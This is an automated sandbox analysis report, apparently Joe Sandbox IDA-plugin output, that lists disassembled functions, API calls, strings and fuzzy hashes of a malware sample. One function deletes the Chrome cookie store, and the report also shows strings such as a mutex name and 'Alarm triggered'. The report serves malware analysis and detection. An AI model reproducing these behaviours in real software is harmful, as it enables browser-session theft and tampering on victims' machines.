                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                                                                                                                                                                                                                              • String ID: h]G
                                                                                                                                                                                                                                                                                                                              • API String ID: 2536120697-1579725984
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 8c8f0d1d08d765d4a28e06ad20e8fb44e6fb0a24af2cea39948b13a93e2f9581
                                                                                                                                                                                                                                                                                                                              • Instruction ID: faa6495482ffb760010bfa20be6f485864068761b5f97391b19e5f0bde606c56
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c8f0d1d08d765d4a28e06ad20e8fb44e6fb0a24af2cea39948b13a93e2f9581
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 10119D3190041AABCB24FBA5C8468DDB7699E85718B20057FF505B72C1EB78AE09C789
                                                                                                                                                                                                                                                                                                                              Function 0040B2A8 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0040B2EE
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                                                                                                                                                                                                                                                                                              • [Chrome Cookies not found], xrefs: 0040B308
                                                                                                                                                                                                                                                                                                                              • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                                                                                                                                                                                                                                                                                              • UserProfile, xrefs: 0040B2B4
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: DeleteErrorFileLast
                                                                                                                                                                                                                                                                                                                              • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                                                                                                                                                                                                                                              • API String ID: 2018770650-304995407
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 477f8d8e1cce002319bc47daca7c673d049266b805f5ad8e1b55e8fa2ffebbba
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 57831ae66bbe87b328e3caf482cfdb9a18bfb77b2c204d956758bc207329a0f7
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 477f8d8e1cce002319bc47daca7c673d049266b805f5ad8e1b55e8fa2ffebbba
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED01A23164410557CB0477B5DD6B8AF3624ED50708F60013FF802B22E2FE3A9A0586CE
                                                                                                                                                                                                                                                                                                                              Function 004064D0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              • BG, xrefs: 00406909
                                                                                                                                                                                                                                                                                                                              • C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, xrefs: 00406927
                                                                                                                                                                                                                                                                                                                              • fyhstga-ONSWMZ, xrefs: 0040693F
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe$fyhstga-ONSWMZ$BG
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-636943447
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 51f1828bc25dd4c0d61216237760cedcfa3e45f86a5da5526d20c461b23c031b
                                                                                                                                                                                                                                                                                                                              • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 51f1828bc25dd4c0d61216237760cedcfa3e45f86a5da5526d20c461b23c031b
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                                                                                                                                                                                                                                                                                              Function 004432F7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00443315
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00443327
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044333A
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044334B
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044335C
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                                              • String ID: 09~
                                                                                                                                                                                                                                                                                                                              • API String ID: 776569668-1645473027
                                                                                                                                                                                                                                                                                                                              • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                                                                                                                                                                                                                                              • Instruction ID: ba617ab3bec5ed021708e8d9793ec2f19a393bb4d037fa002b455214101d6763
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E1F03AB08075208FA712AF6DBD014493BA1F706764342513BF41AB2A71EB780D81DA8E
                                                                                                                                                                                                                                                                                                                              Function 00419F42 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30sleepCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F74
                                                                                                                                                                                                                                                                                                                              • PlaySoundW.WINMM(00000000,00000000), ref: 00419F82
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00002710), ref: 00419F89
                                                                                                                                                                                                                                                                                                                              • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F92
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                                                                                                                                                                                                                                              • String ID: Alarm triggered$`#v
                                                                                                                                                                                                                                                                                                                              • API String ID: 614609389-3049340936
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 923fe6478d4330ed0a62adeb58af83d2e410951945d701d981ba93eeae9722cd
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 9f384250976fc0018356f16acd63f039c2840ecbd7916ddbe948a6dbceb933d3
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 923fe6478d4330ed0a62adeb58af83d2e410951945d701d981ba93eeae9722cd
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0AE09A22A0422037862033BA7C0FC2F3E28DAC6B71B4000BFF905A61A2AE540810C6FB
                                                                                                                                                                                                                                                                                                                              Function 0043960C Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • __allrem.LIBCMT ref: 00439799
                                                                                                                                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397B5
                                                                                                                                                                                                                                                                                                                              • __allrem.LIBCMT ref: 004397CC
                                                                                                                                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397EA
                                                                                                                                                                                                                                                                                                                              • __allrem.LIBCMT ref: 00439801
                                                                                                                                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043981F
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1992179935-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 9c67cb4fed110ca44ac0cc586ac5e74db1fc7c48150eab0f41685f45472ef8a2
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 580a0d75dc01f3f4b0c8d364acae3af6b21ca74026922d198920ae34195595c3
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c67cb4fed110ca44ac0cc586ac5e74db1fc7c48150eab0f41685f45472ef8a2
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8581FC71A01B069BE724AE69CC82B5F73A8AF89368F24512FF411D7381E7B8DD018758
                                                                                                                                                                                                                                                                                                                              Function 02838821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,02836FFD,00000000,?,?,?,02838A72,?,?,00000100), ref: 0283887B
                                                                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,02838A72,?,?,00000100,5EFC4D8B,?,?), ref: 02838901
                                                                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 028389FB
                                                                                                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 02838A08
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028356D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02835702
                                                                                                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 02838A11
                                                                                                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 02838A36
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1414292761-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 587dc8c823f502465d31c5a91bdd88df8d7abd6948e949faa9bbe4e7598599a5
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 50ca1f63e318c9d1f6e333fa78f236c5eb4570c461cf805e154e1d0ac3357728
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 587dc8c823f502465d31c5a91bdd88df8d7abd6948e949faa9bbe4e7598599a5
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F351E7BE610216AFDF268E64CC44FBB77AAEB44754F154628FC09D6140EB34DC60CAD2
                                                                                                                                                                                                                                                                                                                              Function 1001B1EE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,1001B43F,00000001,00000001,?), ref: 1001B248
                                                                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,?,?,?,1001B43F,00000001,00000001,?), ref: 1001B2CE
                                                                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 1001B3C8
                                                                                                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 1001B3D5
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10015A9F: RtlAllocateHeap.NTDLL(00000000,1000A5B7,?), ref: 10015AD1
                                                                                                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 1001B3DE
                                                                                                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 1001B403
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1414292761-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 713b21457b86c78c97a8fa2f39a5facc734242a0c8a2d842c960e8097c1d1dbc
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 2ed5a0c60fab733cb76eb0d012d0445d28864b3239f3e6487cb8682899a93c8b
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 713b21457b86c78c97a8fa2f39a5facc734242a0c8a2d842c960e8097c1d1dbc
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE51F372600A16ABEB15CFA4CC81EAF37E9EF44690F524229FD14DE180EB74EDD1C660
                                                                                                                                                                                                                                                                                                                              Function 00444B4D Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: __cftoe
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 4189289331-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 07fcb3c060a749777e725642930ed18157a1f5019e1f3146b4d3bc33616e3b2a
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 51d3defa9bee42a6449c1cbae1767e96f335fc55d8793b788aa7c8c1dec457a3
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 07fcb3c060a749777e725642930ed18157a1f5019e1f3146b4d3bc33616e3b2a
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE510A72900205ABFB249F598C81FAF77A9EFC9324F25421FF814A6291DB3DDD01866D
                                                                                                                                                                                                                                                                                                                              Function 028315DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • _strlen.LIBCMT ref: 02831607
                                                                                                                                                                                                                                                                                                                              • _strcat.LIBCMT ref: 0283161D
                                                                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,0283190E,?,?,00000000,?,00000000), ref: 02831643
                                                                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(?,?,?,?,?,?,0283190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 0283165A
                                                                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,0283190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 02831661
                                                                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(00001008,?,?,?,?,?,0283190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 02831686
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1922816806-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 41796c742e82e111ec398759d02515e3b33f47fdc63f32b9b789b3f377c6ec55
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 6f718b2247b3cd4897459c09dafef63e3d6c3427729a4217a5abc13e76cf6738
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41796c742e82e111ec398759d02515e3b33f47fdc63f32b9b789b3f377c6ec55
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 57218D3E900204ABD705DB58EC85EEE77B9EF48720F14842AE508EB181DB74A5469BE5
                                                                                                                                                                                                                                                                                                                              Function 02831000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 02831038
                                                                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 0283104B
                                                                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 02831061
                                                                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 02831075
                                                                                                                                                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 02831090
                                                                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 028310B8
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3594823470-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 38225a41950aed0c0381db88527e9fc6f05970d4aa5b612adafab4b2deefc81f
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 091a9f764e91baff139fd43a6989378f4e7c89e1899d65e055e0093560583dc4
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 38225a41950aed0c0381db88527e9fc6f05970d4aa5b612adafab4b2deefc81f
